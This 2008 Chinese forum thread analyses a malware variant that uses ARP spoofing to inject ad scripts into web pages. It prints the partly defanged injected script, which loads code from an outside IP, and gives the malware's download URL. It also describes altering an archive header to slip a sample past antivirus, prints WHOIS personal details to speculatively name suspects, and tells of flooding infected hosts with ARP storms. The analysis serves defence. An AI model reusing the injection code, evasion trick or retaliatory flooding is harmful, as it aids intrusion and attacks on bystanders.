[原创]“磁碟机变种204808”病毒 及分析
[color=red]近期几台机器都中了这个病毒,由于自带ARP欺骗能力,感染力颇强![/color]这个病毒能够伪装成网关,然后在HTML数据头部插入链向 [b]360.gxgxy.net[/b] 的脚本,随机在屏幕左右下角弹出Q币等广告....
而且还会将下载*.exe的请求重定向成病毒 360.gxgxy.net/setup.exe 或者 x.gxgxy.net/setup.exe,所以交叉感染严重。
并且 新的磁碟机变种 还会穿透系统还原,任务管理器还无法结束,
[color=red]总之是个很难缠的病毒。[/color]
这是金山关于这个病毒的介绍:
[quote]“磁碟机变种204808”(Win32.VcingT.ph.204808)威胁级别:★★
病毒进入用户的电脑系统后,会在系统盘中释放出7个病毒文件,分别为%WINDOWS%\system32\Com\目录下的lsass.exe、smss.exe、netcfg.dll、netcfg.000,c:\WINDOWS\system32\目录下的dnsq.dll,c:\WINDOWS\system32\drivers\目录下的alg.exe,以及系统盘根目录下的037589.log。此外,病毒还会在所有磁盘分区中,生成AUTO病毒autorun.inf和相应的pagefile.pif病毒文件,只要用户用鼠标左键双击含毒磁盘分区,病毒就会再次被激活。如果用户在中毒电脑上使用U盘等移动存储器,病毒也会立即将其传染,借以扩大自己的传播范围。
随后,病毒篡改系统相关数据,将自己添加到系统盘“%DocumentsandSettings%\AllUsers\「开始」菜单\程序\启动\~.exe.xxxxxx”路径下,进行自启动(xxxxxx为随机数字)。然后,它迅速破坏电脑中已安装的安全软件的运行,几乎所有著名厂商的产品都在该病毒的“黑名单”中。
病毒运行后,大量感染所有非系统盘分区下的exe文件,连rar、zip压缩包内的exe文件也不放过。同时它还感染htm、html等格式的网页文件,添加挂马代码。如果电脑已连接网络,病毒就会先访问w.XXX.com/r.htm这个由黑客指定的地址,获取一个病毒文件列表,然后利用IE浏览器悄悄下载上述列表中的的病毒。被下载的病毒毒中,有盗号木马、ARP欺骗病毒等,它们会给用户的系统安全、个人隐私、虚拟财产造成无法估计的更大破坏。并且,其中的ARP病毒会立即展开对局域网内其它电脑的攻击,造成局域网瘫痪。
被该病毒感染的文件体积会有所增大,并且只要启动这些文件,病毒就会被激活发作,同时造成部分受感染文件的损坏。不过使用毒霸就可修复绝大多数被感染的文件。[/quote]
压缩包中文件说明:
gxgxy_Setup_UnRAR.ex_ 这个就是 360.gxgxy.net/setup.exe 那个压缩包解压后的文件,可以用金山扫出来。有UPX壳。
ff[1].js 插入脚本 360.gxgxy.net/1.js
文件夹 down_gxgxy 从gxgxy下载来的插入广告
文件夹 gxgxy_Setup_unpack 从 gxgxy_Setup_UnUPX.ex_ 里拆出的东西
其他的见我楼下的分析。
[[i] 本帖最后由 grsgrs 于 2008-2-3 14:28 编辑 [/i]]
原文:近期中了“磁碟机变种”,打开网页还会弹Q币广告的进..
[font=宋体][size=10.5pt][size=3][color=#000000]昨天查出了 磁碟机变种204808 (Win32.VcingT.ph.204808),Ghost恢复系统发现,打开大部分网页仍然会被插入[/color][color=#000000] ht tp://[/color][color=red]360.gxgxy.net/1.js[/color][color=#000000] [/color][color=#000000]这个脚本。[/color][/size][size=3][color=#000000]虽然毒霸把D: E: 盘的毒都清除了,但是问题依旧(除了开百度等少数网站,大多页面都会被插入此脚本,一般是插在代码头部),[/color][color=blue]所以特此发表此文,提醒各位同样中招的朋友。[/color][/size]
[size=3][color=#000000]今天在虚拟机里分析了半天,发现这“磁碟机变种”还真是这个 360.gxgxy.net 网站带来的。[/color][/size]
[/size][/font][font=宋体][size=3][color=#000000]病毒文件[/color][/size][/font][font=宋体][size=10.5pt][size=3][color=#000000]是:[/color][/size][size=3][color=#000000]ht tp://360.gxgxy.net/setup.exe
下载后千万别运行,这个正是(磁碟机变种204808),超级难缠。[/color][/size]
[size=3][color=#000000]现在我只能在IE里屏蔽 360.gxgxy.net 这个站点,希望有知道解决网页插入脚本问题的大侠解救在下,不胜感激。[/color][/size][/size][/font]
[font=Times New Roman][size=3][color=#000000] [/color][/size][/font]
[font=Times New Roman][size=3][color=#000000] [/color][/size][/font]
[color=#000000][font=宋体][size=10.5pt]首先要说的是警惕[/size][/font][size=10.5pt] 360.gxgxy.net [/size][font=宋体][size=10.5pt]这个网站,一定要屏蔽他,不然小心二次感染![/size][/font][/color]
[color=#000000]以下是分析过程,供各位参考:[/color]
[color=#000000][font=宋体][size=10.5pt]首先是在[/size][/font][size=10.5pt]IE[/size][font=宋体][size=10.5pt]缓存文件夹下发现[/size][/font][size=10.5pt] ff[1].js[/size][font=宋体][size=10.5pt],毒霸报[/size][/font][size=10.5pt]JS.ArpSc.a.353[/size][font=宋体][size=10.5pt],打开分析,发现是这样的内容(我去掉了部分字符,防止被毒霸杀掉):[/size][/font][/color][size=10.5pt]
[color=gray]<sc ipt>
doc ment.writeln("<s ript type=\"text\/javas ript\" src = \"h tp:\/\/121.15.220.104\/52gxy\/ffqq.js\"><\?")
</script>[/color]
[/size][color=#000000][font=宋体][size=10.5pt]接着下载[/size][/font][size=10.5pt] 121.15.220.104/52gxy/ffqq.js [/size][font=宋体][size=10.5pt]这个脚本,果然链接到[/size][/font][size=10.5pt] 360.gxgxy.net [/size][font=宋体][size=10.5pt]这个网站了:[/size][/font][/color][size=10.5pt]
[color=dimgray]<a hr f="ht p://360.gxgxy.net/html/qb1.html" target="_blank"><img src="ht p://360.gxgxy.net/img/qb5.gif" width="760" height="80" border="0"></a>
<d v id="myads3" style="width:256px;height:159px;position:absolute;z-index:30000;bottom:0px;right:0px;background-color:#ffffff;">
<div style='height:159;overflow:hidden;background-image:url(ht p://360.gxgxy.net/img/dj1.gif)'><iframe style='FILTER: Alpha(Opacity=0);' width='256' height='159' marginWidth='0' marginHeight='0' frameBorder='0' scrolling='no' src='h p://360.gxgxy.net/html/dj4.html' name='I123'></iframe></div>
</div>
<sc ipt language="ja ascript">
function myads3(){
doc ment.all.myads3.style.top=document.body.scrollTop+document.body.clientHeight-159;
doc ment.all.myads3.style.left=document.body.scrollLeft +document.body.clientWidth-256}
window.setInterval("myads3()",1);
</script>[/color]
[/size][color=#000000][font=宋体][size=10.5pt]这只是其中的一部分,内容都差不多,就是换着链接去显示[/size][/font][size=10.5pt] 360.gxgxy.net [/size][font=宋体][size=10.5pt]里的广告。整理之后,发现访问的网址有:[/size][/font][/color][size=10.5pt]
<a>
ht tp://360.gxgxy.net/html/qb1.html
<pic> [/size][font=宋体][size=10.5pt]这几张[/size][/font][size=10.5pt]GIF[/size][font=宋体][size=10.5pt]就是弹出广告里的图片了[/size][/font][size=10.5pt]
ht tp://360.gxgxy.net/img/dj1.gif
h ttp://360.gxgxy.net/img/dj2.gif
h ttp://360.gxgxy.net/img/qb5.gif
h ttp://360.gxgxy.net/img/qq2.gif
<iframe>
ht tp://360.gxgxy.net/html/qq1.html
ht tp://360.gxgxy.net/html/dj2.html
ht tp://360.gxgxy.net/html/dj4.html
ht tp://360.gxgxy.net/html/dj8.html
<other>
htt p://mms1.youav.com/mmv/sp1/sp_1.htm?uid=20087
[/size]
[font=宋体][size=10.5pt][color=#000000]接着下载这些东西,发现都是些这样的东西:[/color][/size][/font][size=10.5pt]
[color=dimgray]<div style="Z-INDEX: 1; LEFT: 0px; POSITION: absolute; TOP: 0px; "><iframe marginWidth="0" marginHeight="0" frameBorder="0" width="760" scrolling="no" height="100" src="h tp://www.txshi.com/index.html" ></iframe></div>[/color]
[/size][font=宋体][size=10.5pt][color=#000000]都是链接外部站点的广告(分析了以下四个):[/color][/size][/font][size=10.5pt]
[color=gray]ht tp://www.txshi.com/index.html
ht tp://www.feihua8.com/yanyuan.htm
ht tp://www.21cnyl.com/movielistaction9.html
ht tp://www.21cnyl.com/yanyuan.htm[/color]
[/size][font=宋体][size=10.5pt][color=#000000]页面上比较干净,没找到什么木马之类的,追踪失败[/color][/size][/font][size=10.5pt][color=#000000]...[/color]
[/size] [size=3][color=red][font=宋体][size=10.5pt]上网[/size][/font][/color][color=red][size=10.5pt][font=Times New Roman]Google[/font][/size][/color][color=red][font=宋体][size=10.5pt]了一把,发现已经有人问过[/size][/font][/color][color=red][size=10.5pt][font=Times New Roman] 360.gxgxy.net [/font][/size][/color][color=red][font=宋体][size=10.5pt]问题了,但是都没有什么实际的解决办法。[/size][/font][/color][/size]
[size=3][color=red][font=宋体][size=10.5pt]不过让我找到了[/size][/font][/color][color=red][size=10.5pt][font=Times New Roman] ht tp://360.gxgxy.net/setup.exe [/font][/size][/color][color=red][font=宋体][size=10.5pt]这个链接。[/size][/font][/color][/size]
[size=3][color=red][font=宋体][size=10.5pt]下载后发现,这是一个[/size][/font][/color][color=red][size=10.5pt][font=Times New Roman]Winrar[/font][/size][/color][color=red][font=宋体][size=10.5pt]的自解压缩包,于是弄出来看了看,是个解压后为[/size][/font][/color][color=red][size=10.5pt][font=Times New Roman] 90,112[/font][/size][/color][color=red][font=宋体][size=10.5pt]字节的[/size][/font][/color][/size][size=3][color=red][size=10.5pt][font=Times New Roman] setup.exe
[/font][/size][/color][color=red][font=宋体][size=10.5pt]文件是[/size][/font][/color][color=red][size=10.5pt][font=Times New Roman]UPX[/font][/size][/color][color=red][font=宋体][size=10.5pt]加壳的,用毒霸扫描报[/size][/font][/color][color=red][size=10.5pt][font=Times New Roman] VCingT[/font][/size][/color][color=red][font=宋体][size=10.5pt],看来是因为这个而中毒的了。[/size][/font][/color][/size]
[size=3][color=#000000][font=宋体][size=10.5pt]翻出[/size][/font][size=10.5pt][font=Times New Roman]UPX[/font][/size][font=宋体][size=10.5pt],用[/size][/font][size=10.5pt][font=Times New Roman]UPX -d setup.exe -o sk.ex_ [/font][/size][font=宋体][size=10.5pt]脱壳到[/size][/font][size=10.5pt][font=Times New Roman] sk.ex_[/font][/size][font=宋体][size=10.5pt],然后放到虚拟机里准备分析。[/size][/font][/color][/size][size=10.5pt]
[font=Times New Roman][size=3][color=#000000]UPX[/color][/size][/font][/size][size=3][color=#000000][font=宋体][size=10.5pt]脱壳后[/size][/font][size=10.5pt][font=Times New Roman]sk.ex_[/font][/size][font=宋体][size=10.5pt]大小为[/size][/font][size=10.5pt][font=Times New Roman] 139,264[/font][/size][font=宋体][size=10.5pt]字节,用毒霸扫描居然不认识了!!![/size][/font][/color][/size]
[size=3][color=#000000][font=宋体][size=10.5pt]在虚拟机中,先用[/size][/font][size=10.5pt][font=Times New Roman]WinHex[/font][/size][font=宋体][size=10.5pt]扫了一遍,发现文件中有[/size][/font][size=10.5pt][font=Times New Roman]3[/font][/size][font=宋体][size=10.5pt]个[/size][/font][size=10.5pt][font=Times New Roman]PE[/font][/size][font=宋体][size=10.5pt]头部,于是顺次拆开。[/size][/font][/color][/size]
[size=3][color=#000000][font=宋体][size=10.5pt]第二个[/size][/font][size=10.5pt][font=Times New Roman] MZ[/font][/size][font=宋体][size=10.5pt]标记[/size][/font][size=10.5pt][font=Times New Roman] [/font][/size][font=宋体][size=10.5pt]出现在[/size][/font][size=10.5pt][font=Times New Roman] 0x18C20 [/font][/size][font=宋体][size=10.5pt]处,第三个在[/size][/font][size=10.5pt][font=Times New Roman] 0x19C20 [/font][/size][font=宋体][size=10.5pt]处。[/size][/font][/color][/size]
[size=3][color=#000000][font=宋体][size=10.5pt]从[/size][/font][size=10.5pt][font=Times New Roman] 19C20 [/font][/size][font=宋体][size=10.5pt]到文件末尾复制到新文件,发现这个也是[/size][/font][size=10.5pt][font=Times New Roman]UPX[/font][/size][font=宋体][size=10.5pt]加壳的。不过这次不管是脱壳前还是脱壳后,毒霸都能查出是[/size][/font][size=10.5pt][font=Times New Roman]VCingT[/font][/size][font=宋体][size=10.5pt]了。[/size][/font][/color][/size]
[size=3][color=#000000][font=宋体][size=10.5pt]至此可以证明,[/size][/font][size=10.5pt][font=Times New Roman]360.gxgxy.net [/font][/size][font=宋体][size=10.5pt]下的[/size][/font][size=10.5pt][font=Times New Roman] setup.exe [/font][/size][font=宋体][size=10.5pt]正是[/size][/font][size=10.5pt][font=Times New Roman]VCingT[/font][/size][font=宋体][size=10.5pt]的源文件,所以要大家小心这个网站。[/size][/font][size=10.5pt][/size][/color][/size]
[size=10.5pt][font=Times New Roman][size=3][color=#000000] [/color][/size][/font][/size]
[size=10.5pt][font=Times New Roman][size=3][color=#000000] [/color][/size][/font][/size]
[size=10.5pt][font=Times New Roman][size=3][color=#000000] [/color][/size][/font][/size]
[size=10.5pt][font=Times New Roman][size=3][color=#000000] [/color][/size][/font][/size]
[size=10.5pt][font=Times New Roman][size=3][color=#000000] [/color][/size][/font][/size]
[size=10.5pt][font=Times New Roman][size=3][color=#000000] [/color][/size][/font][/size]
[font=宋体][size=10.5pt][size=3][color=#000000]回头又分析了之前认为是干净的三个网站链接:[/color][/size][/size][/font][size=10.5pt]
[color=gray][font=Times New Roman][size=3]w ww.txshi.com => 121.15.245.59 [/size][/font][/color][/size][color=gray][font=宋体][size=10.5pt][size=3]广东惠州电信枢纽机房[/size][/size][/font][/color][color=gray][size=10.5pt]
[font=Times New Roman][size=3]w ww.feihua8.com => 121.15.245.59 [/size][/font][/size][/color][color=gray][font=宋体][size=10.5pt][size=3]广东惠州电信枢纽机房[/size][/size][/font][/color][color=gray][size=10.5pt]
[font=Times New Roman][size=3]w ww.21cnyl.com => 121.15.220.104 [/size][/font][/size][/color][color=gray][font=宋体][size=10.5pt][size=3]广东惠州电信[/size][/size][/font][/color]
[size=3][color=red][font=宋体][size=10.5pt]而那个[/size][/font][/color][color=red][size=10.5pt][font=Times New Roman] 360.gxgxy.net[/font][/size][/color][color=red][font=宋体][size=10.5pt],居然和[/size][/font][/color][color=red][size=10.5pt][font=Times New Roman]21cnyl.com[/font][/size][/color][color=red][font=宋体][size=10.5pt]是一台服务器!!![/size][/font][/color][/size][color=red][size=10.5pt]
[font=Times New Roman][size=3]360.gxgxy.net => 121.15.220.104[/size][/font][/size][/color]
[size=3][color=#000000][font=宋体][size=10.5pt]让我发现一个有意思的东西,除了[/size][/font][size=10.5pt][font=Times New Roman]360.gxgxy.net[/font][/size][font=宋体][size=10.5pt],三个广告页面都包含这样一行:[/size][/font][/color][/size][size=10.5pt]
[color=dimgray]
[font=Times New Roman][size=3]<m eta name="author" con tent="xujiefei888@163.com,[/size][/font][/color][/size][color=dimgray][font=宋体][size=10.5pt][size=3]阿飞[/size][/size][/font][/color][color=dimgray][size=10.5pt][font=Times New Roman][size=3]" />
[/size][/font][/size][/color]
[font=宋体][size=10.5pt][size=3][color=#000000]而且其中两个网站的备案记录是:[/color][/size][/size][/font]
[size=3][color=gray][font=宋体][size=10.5pt]新世纪电影网[/size][/font][/color][color=gray][size=10.5pt][font=Times New Roman] [/font][/size][/color][color=gray][font=宋体][size=10.5pt]桂[/size][/font][/color][color=gray][size=10.5pt][font=Times New Roman]ICP[/font][/size][/color][color=gray][font=宋体][size=10.5pt]备[/size][/font][/color][/size][size=3][color=gray][size=10.5pt][font=Times New Roman]05001912
[/font][/size][/color][color=gray][font=宋体][size=10.5pt]天下事电影网[/size][/font][/color][color=gray][size=10.5pt][font=Times New Roman] [/font][/size][/color][color=gray][font=宋体][size=10.5pt]桂[/size][/font][/color][color=gray][size=10.5pt][font=Times New Roman]ICP[/font][/size][/color][color=gray][font=宋体][size=10.5pt]备[/size][/font][/color][color=gray][size=10.5pt][font=Times New Roman]05001912[/font][/size][/color][/size]
[size=3][color=#000000][font=Times New Roman]Whois[/font]信息[/color][/size][font=宋体][size=10.5pt][size=3][color=#000000]:[/color][/size][/size][/font][size=10.5pt]
[font=Times New Roman][size=3][color=#000000]Domain Name:feihua8.com
Registrant:
Xu Jiefei
Guangxi province,Guigang City
537100
Administrative Contact:
XuJiefei
Xu Jiefei
Guangxi province,Guigang City
Guigang Guangxi 537100
CN
tel: 077 54226825
fax: 077 54226825
[email]xujiefei888@163.com[/email]
[/color][/size][/font][/size][size=3][color=#000000][font=宋体][size=10.5pt]从[/size][/font][size=10.5pt][font=Times New Roman]Email[/font][/size][font=宋体][size=10.5pt]上可以看出,这三个网站因该都是[/size][/font][size=10.5pt][font=Times New Roman] Xu Jiefei [/font][/size][font=宋体][size=10.5pt]这个人的。[/size][/font][/color][/size]
[size=3][color=#000000][font=宋体][size=10.5pt]而[/size][/font][size=10.5pt][font=Times New Roman] 360.gxgxy.net [/font][/size][font=宋体][size=10.5pt]是:[/size][/font][/color][/size][size=10.5pt]
[font=Times New Roman][size=3][color=#000000]Domain Name:gxgxy.net
Registrant:
gong xueyuan
guangxi province,liuzhou City
545006
Administrative Contact:
gongxueyuan
gong xueyuan
guangxi province,liuzhou City
lliuzhou Guangxi 545006
CN
tel: 772 2685745
fax: 772 2685745
[email]gongxueyuan@163.com[/email]
Registration Date: 2007-12-27
Update Date: 2007-12-27
Expiration Date: 2008-12-27
[/color][/size][/font][/size][size=3][color=#000000][font=宋体][size=10.5pt]第一,这个[/size][/font][size=10.5pt][font=Times New Roman] [email]gongxueyuan@163.com[/email] [/font][/size][font=宋体][size=10.5pt]也是广西的,和[/size][/font][size=10.5pt][font=Times New Roman] Xu Jiefei [/font][/size][font=宋体][size=10.5pt]位属同一地点![/size][/font][/color][/size]
[size=3][color=#000000][font=宋体][size=10.5pt]第二,这个[/size][/font][size=10.5pt][font=Times New Roman] gxgxy.net [/font][/size][font=宋体][size=10.5pt]是[/size][/font][size=10.5pt][font=Times New Roman] 2007-12-27 [/font][/size][font=宋体][size=10.5pt]注册的,估计是为了安放病毒而特意弄来的。[/size][/font][/color][/size]
[size=3][color=#000000][font=宋体][size=10.5pt]从[/size][/font][size=10.5pt][font=Times New Roman] gxgxy.net [/font][/size][font=宋体][size=10.5pt]和[/size][/font][size=10.5pt][font=Times New Roman] 21cnyl.com [/font][/size][font=宋体][size=10.5pt]安放在同一台主机,并且[/size][/font][size=10.5pt][font=Times New Roman]21cnyl.com[/font][/size][font=宋体][size=10.5pt]的域名申请人也是[/size][/font][size=10.5pt][font=Times New Roman]xu jiefei[/font][/size][font=宋体][size=10.5pt],可以推断出制作[/size][/font][size=10.5pt][font=Times New Roman]360.gxgxy.net[/font][/size][font=宋体][size=10.5pt]的人是[/size][/font][size=10.5pt][font=Times New Roman]xu jiefei[/font][/size][font=宋体][size=10.5pt]认识的人甚至是其本人!虽然[/size][/font][size=10.5pt][font=Times New Roman]gxgxy.net[/font][/size][font=宋体][size=10.5pt]域名注册人不是[/size][/font][size=10.5pt][font=Times New Roman]xu jiefei[/font][/size][font=宋体][size=10.5pt],但也可以初步认为是其为了掩人耳目而更换的。[/size][/font][/color][/size]
[size=3][color=#000000][font=宋体][size=10.5pt]不过考虑到[/size][/font][size=10.5pt][font=Times New Roman]21cnyl.com[/font][/size][font=宋体][size=10.5pt]的注册日期较早([/size][/font][size=10.5pt][font=Times New Roman]2005[/font][/size][font=宋体][size=10.5pt]年就注册了),但网站搜索引擎收录和反向链接情况不佳:[/size][/font][/color][/size]
[size=3][color=dimgray][font=宋体][size=10.5pt]搜索引擎[/size][/font][/color][color=dimgray][size=10.5pt][font=Times New Roman] [/font][/size][/color][color=dimgray][font=宋体][size=10.5pt]收录页面数[/size][/font][/color][color=dimgray][size=10.5pt][font=Times New Roman] [/font][/size][/color][color=dimgray][font=宋体][size=10.5pt]反向链接数[/size][/font][/color][/size][size=3][color=dimgray][size=10.5pt][font=Times New Roman]
[/font][/size][/color][color=dimgray][font=宋体][size=10.5pt]谷歌[/size][/font][/color][/size][size=3][color=dimgray][size=10.5pt][font=Times New Roman] (Google) -- --
[/font][/size][/color][color=dimgray][font=宋体][size=10.5pt]百度[/size][/font][/color][/size][size=3][color=dimgray][size=10.5pt][font=Times New Roman] (Baidu) -- --
[/font][/size][/color][color=dimgray][font=宋体][size=10.5pt]雅虎[/size][/font][/color][/size][size=3][color=dimgray][size=10.5pt][font=Times New Roman] (Yahoo) 1 6
MSN -- --
[/font][/size][/color][color=dimgray][font=宋体][size=10.5pt]网易[/size][/font][/color][/size][size=3][color=dimgray][size=10.5pt][font=Times New Roman] (So163) -- --
[/font][/size][/color][color=dimgray][font=宋体][size=10.5pt]搜狗[/size][/font][/color][/size][size=3][color=dimgray][size=10.5pt][font=Times New Roman] (Sogou) 1 9
[/font][/size][/color][color=dimgray][font=宋体][size=10.5pt]中国排名[/size][/font][/color][color=dimgray][size=10.5pt][font=Times New Roman] (ChinaRank) [/font][/size][/color][color=dimgray][font=宋体][size=10.5pt]今日[/size][/font][/color][color=dimgray][size=10.5pt][font=Times New Roman]:4093 [/font][/size][/color][color=dimgray][font=宋体][size=10.5pt]近一周[/size][/font][/color][color=dimgray][size=10.5pt][font=Times New Roman]:4555 [/font][/size][/color][color=dimgray][font=宋体][size=10.5pt]近三月[/size][/font][/color][/size][size=3][color=dimgray][size=10.5pt][font=Times New Roman]:5780
[/font][/size][/color][color=dimgray][font=宋体][size=10.5pt]搜狗[/size][/font][/color][/size][color=dimgray][size=10.5pt][font=Times New Roman][size=3] Rank 13 w ww.21cnyl.com
10 21cnyl.com [/size][/font][/size][/color]
[font=宋体][size=10.5pt][size=3][color=#000000]也不排除其为了推广网站而投放病毒的可能。[/color][/size][/size][/font]
[color=red][font=宋体][size=10.5pt][size=3]我不是警察,无法深入调查取证,无法阻止正在危害着我们的行为,也不能像黑客一般进入服务器验明其正身。各位仁者见仁,智者见智,我只想告诉看帖的各位,到底那些插入脚本的广告因何而生,为谁谋利。[/size][/size][/font][/color] 压缩包中有个 st_k3_VCingT.rar,为了防止被金山杀了,我曾用WinHex将WinRAR的文件头 Rar!... 改成了 R_r!...
解压缩前把这个改过来就行了。
ps: 磁碟机变种 原本是个通过U盘的 Autorun.inf 执行的病毒,现在估计“进化”了,
我之前被感染2次,清了又冒出来,简直烦透了。现在想想,估计还是因为ARP欺骗,被插了脚本
现在自己写了个MAC扫描工具,每次ARP防火墙一报警,马上扫描中毒机器真实IP,用ARP风暴把目标主机资源耗尽,卡得他下线为止。 之前说的 MAC扫描工具及其源码: [url]http://www.netexpert.cn/thread-18541-1-1.html[/url]
准备找个时间用IDA把这个病毒给拆了,看看他发送ARP回应是如何实现的。
最近研究winpcap小有成效,终于能自己发送伪造MAC的数据包了... 呵呵,学习牛人!俺在逆向工程分析方面还得多学习! 我也没用OD,SoftIce之类的看它的源码,主要是太耗时间而且用得不熟:funk:
只是简单用Sniffer跟踪了一下这个病毒的网络行为,本机如何传染的还不得而知,期待牛人来拆了它吧。
想跟踪其传播途径,直接把这种东西放到虚拟机里,然后拿Sniffer抓VM的虚拟网卡就行了,病毒干了什么都明明白白的。之后就是对存放病毒的主机进行屏蔽,再给中毒的机器扫描扫描。 现在才看到文章
喜欢这样条里清晰 分析透彻的文章,像科普读物
长见识了 谢谢!
页:
[1]